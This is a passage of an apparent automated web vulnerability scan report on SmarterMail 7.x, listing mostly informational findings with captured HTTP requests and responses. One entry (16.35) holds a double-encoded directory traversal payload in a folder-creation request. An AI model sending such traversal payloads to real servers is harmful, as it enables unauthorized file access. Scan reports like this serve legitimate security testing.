
Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmMyAutoResponder.aspx

Request

POST /Main/frmMyAutoResponder.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmMyAutoResponder.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 10369

ctl00_MPH_RadAutoResponse_dialogOpener_ClientState=&__LASTFOCUS=&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00_MPH_RadAutoResponse_ClientState=&ctl00%24MPH%24chkEnabled_SettingCheck=on&ctl00%24
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:30 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:30 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length:
...[SNIP]...

16.21. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmMyInfo.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmMyInfo.aspx

Request

POST /Main/frmMyInfo.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmMyInfo.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 18089

ctl00%24MPH%24wucContactInfo%24txtCompanyZip_SettingText=Wiener+Consulting&ctl00%24MPH%24wucContactInfo%24txtPersonNameTitle_SettingText=Peter+Wiener&__LASTFOCUS=&ctl00%24MPH%24wucContactInfo%24txtEma
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:31 GMT
Content-Length: 0

HTTP/2.0 302 Found
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:31 GMT
X-AspNet-Version: 2.0.50727
Location: /frmError.aspx?aspxerrorpath=/Main/frmMyInfo.aspx
Cache-Control: p
...[SNIP]...

16.22. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmNote.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmNote.aspx

Request

POST /Main/frmNote.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmNote.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 5038

__VIEWSTATE=%2fwEPDwUJNTMwODkzMTIzDxYGHghfX19UaXRsZQUITXkgTm90ZXMeEF9fX1Jlc3VsdEZhaWx1cmVlHhBfX19SZXN1bHRTdWNjZXNzZRYCZg9kFgICAQ9kFgoCAw9kFgQCAQ9kFgICAw8PFgIeB1Zpc2libGVoZGQCAw9kFgICAQ8PFgIfA2hkZAIEDx
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:17 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:17 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length:
...[SNIP]...

16.23. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmSignature.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmSignature.aspx

Request

POST /Main/frmSignature.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmSignature.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 7033

__VIEWSTATE=%2fwEPDwUKMTA3MDM4NjU2NA8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWBgIFDxYCHgdWaXNpYmxlaGQCBw9kFgJmD2QWAgIBDxYCHwJoFgICAQ8WAh4EVGV4dGVkAgsPZBYCAgMPPCsAFgUADxYQHg
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:34 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:34 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html;
...[SNIP]...

16.24. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmSignatures.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmSignatures.aspx

Request

POST /Main/frmSignatures.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmSignatures.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 5346

ctl00%24MPH%24lstUserPrimarySignature_SettingDropDown=domain&__VIEWSTATE=%2fwEPDwULLTIxMDYxNTgyNjEPFgQeEF9fX1Jlc3VsdEZhaWx1cmVlHhBfX19SZXN1bHRTdWNjZXNzZRYCZg9kFgICAQ9kFgoCAw9kFgICAQ9kFgICAw9kFgICAQ8PF
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:35 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:35 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length:
...[SNIP]...

16.25. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmSpamOptions.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmSpamOptions.aspx

Request

POST /Main/frmSpamOptions.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmSpamOptions.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 10119

__VIEWSTATE=%2fwEPDwULLTE5NDY0MzU1MjQPFgoeCF9fX1RpdGxlBQ5TcGFtIEZpbHRlcmluZx4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlHg5WU19Eb21haW5MZXZlbGgeEVZTX0N1cnJlbnRXZWlnaHRzFyIFDlNwYW1oYXVzIC0gUEJMAg
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:36 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:36 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length:
...[SNIP]...

16.26. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmSyncMLList.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmSyncMLList.aspx

Request

POST /Main/frmSyncMLList.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmSyncMLList.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 7216

__VIEWSTATE=%2fwEPDwUJMjIxNTE5NTQ3DxYGHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UeBF9zR0ZnFgJmD2QWAgIBD2QWBgIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx4HVmlzaWJsZWhkAgYPFgIfBGhkAgcPZBYCZg9kFgICAQ8WAh
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:37 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:37 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length:
...[SNIP]...

16.27. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmTask.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmTask.aspx

Request

POST /Main/frmTask.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmTask.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 19335

ctl00_MPH_EndDatePicker_SettingText_calendar_AD=%5b%5b1900%2c1%2c1%5d%2c%5b2100%2c1%2c1%5d%2c%5b2010%2c10%2c1%5d%5d&ctl00%24MPH%24txtPassedMessageID=&__LASTFOCUS=&ctl00_MPH_StartDatePicker_SettingText
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:15 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:15 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length:
...[SNIP]...

16.28. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmWelcome.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmWelcome.aspx

Request

POST /Main/frmWelcome.aspx?unframed=true HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmWelcome.aspx?unframed=true
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default
Content-Length: 6025

ctl00%24ctl01=ctl00%24BrPH%24UpdatePanel_Buttons%7Cctl00%24BrPH%24btnNext&__EVENTTARGET=ctl00%24BrPH%24btnNext&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMjA2NDUzNTkxNg8WBh4IX19fVGl0bGUFGlNtYXJ0ZXJNYWlsIE
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:19:12 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:19:12 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain;
...[SNIP]...

16.29. http://vulnerable.SmarterMail 7.x.host:9998/Main/javascript:OpenMasterCategoriesPopup()

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/javascript:OpenMasterCategoriesPopup()

Request

GET /Main/javascript:OpenMasterCategoriesPopup() HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmContact.aspx?popup=true
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 400 Bad Request
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:38:59 GMT
Content-Length: 1212
Connection: Close

<html>
<head>
<title>Bad Request</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-w
...[SNIP]...

16.30. http://vulnerable.SmarterMail 7.x.host:9998/Main/javascript:parent.OpenNewMessage('/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/javascript:parent.OpenNewMessage('/

Request

GET /Main/javascript:parent.OpenNewMessage('/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 400 Bad Request
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 1212
Connection: Close

<html>
<head>
<title>Bad Request</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-w
...[SNIP]...

16.31. http://vulnerable.SmarterMail 7.x.host:9998/Main/javascript:parent.OpenNewMessage('/Main/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/javascript:parent.OpenNewMessage('/Main/

Request

GET /Main/javascript:parent.OpenNewMessage('/Main/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 400 Bad Request
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 1212
Connection: Close

<html>
<head>
<title>Bad Request</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-w
...[SNIP]...

16.32. http://vulnerable.SmarterMail 7.x.host:9998/Main/javascript:parent.OpenNewMessage('/Main/frmCompose.aspx',%20800,%20600)

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/javascript:parent.OpenNewMessage('/Main/frmCompose.aspx',%20800,%20600)

Request

GET /Main/javascript:parent.OpenNewMessage('/Main/frmCompose.aspx',%20800,%20600) HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 400 Bad Request
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:38:59 GMT
Content-Length: 1212
Connection: Close

<html>
<head>
<title>Bad Request</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-w
...[SNIP]...

16.33. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmEditCustomReport.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Reports/frmEditCustomReport.aspx

Request

POST /Reports/frmEditCustomReport.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmEditCustomReport.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 5470

ctl00_MPH_HyperGrid1_HiddenInput=&__VIEWSTATE=%2fwEPDwUKMjAyODA5OTUyMg8WBh4IX19fVGl0bGUFDkN1c3RvbSBSZXBvcnRzHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYIAgQPFgQeBXN0eWxlBQ1kaXNw
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:59 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:59 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length:
...[SNIP]...

16.34. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Reports/frmReport.aspx

Request

POST /Reports/frmReport.aspx?level=user&reportid=3C423C57823C4B519A0426B8EF6C15D5&MyReports HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx?level=user&reportid=3C423C57823C4B519A0426B8EF6C15D5&=MyReports
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 3961

ctl00_MPH_InternalReportItem0_TableMenu_S_MI4_CB=on&ctl00_MPH_InternalReportItem0_SortMenu_S_MI2_CB=on&ctl00_MPH_InternalReportItem0_ChartMenu_S_MI7_CB=on&ctl00_MPH_InternalReportItem0_ChartMenu_S_SMI
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:57 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:57 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length:
...[SNIP]...

16.35. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmAddFileStorageFolder.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /UserControls/Popups/frmAddFileStorageFolder.aspx

Request

POST /UserControls/Popups/frmAddFileStorageFolder.aspx?parent=Root+Folder%5c%252e%252e%252e%252e%255c%252e%252e%252e%252e%255c%252e%252e%252e%252e%255c%252e%252e%252e%252e%255c%252e%252e%252e%252e%255c%252e%252e%252e%252e%255c%7bFILE%7d%5c HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: keep-alive
Referer: http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmAddFileStorageFolder.aspx?parent=Root+Folder%5c%252e%252e%252e%252e%255c%252e%252e%252e%252e%255c%252e%252e%252e%252e%255c%252e%252e%252e%252e%255c%252e%252e%252e%252e%255c%252e%252e%252e%252e%255c%7bFILE%7d%5c
Origin: http://vulnerable.SmarterMail 7.x.host:9998
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SelectedLanguage=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1293362628","TopBarSection":"UserStorage","RootLPSize":300}
Content-Length: 40446

ctl00%24ScriptManager=ctl00%24ScriptManager%7Cctl00%24BrPH%24SaveButton&__LASTFOCUS=&__EVENTTARGET=ctl00%24BrPH%24SaveButton&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJNjQzNzgwNTYzDxYGHghfX19UaXRsZQUGRm9s
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 23:38:57 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 23:38:58 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: no-cache
Pragma: no-cache
Expire
...[SNIP]...

16.36. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmDeviceSync.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /UserControls/Popups/frmDeviceSync.aspx

Request

POST /UserControls/Popups/frmDeviceSync.aspx HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmDeviceSync.aspx
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=
Content-Length: 17133

ctl00%24ScriptManager=ctl00%24ScriptManager%7Cctl00%24BPH%24chkShowAtLogin&__EVENTTARGET=ctl00%24BPH%24chkShowAtLogin&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKLTkxNjAzNDgyNg8WBB4QX19fUmVzdW
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:19:27 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:19:27 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: no-cache
Pragma: no-cache
Expire
...[SNIP]...

16.37. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmGridSetup.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /UserControls/Popups/frmGridSetup.aspx

Request

POST /UserControls/Popups/frmGridSetup.aspx?type=calendar HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmGridSetup.aspx?type=calendar
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 2232

chkallcolumn=on&ctl00_MPH_HyperGrid1_HiddenInput=&chk_column_1=on&__VIEWSTATE=%2fwEPDwUJNDY0MTY0NDQ3DxYGHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UeDkN1cnJlbnRDb2x1bW5zMpwJAAEAAAD%2f%2f%2f%2f%
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:53 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:53 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html;
...[SNIP]...

16.38. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/javascript:ClosePopup()

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /UserControls/Popups/javascript:ClosePopup()

Request

GET /UserControls/Popups/javascript:ClosePopup() HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
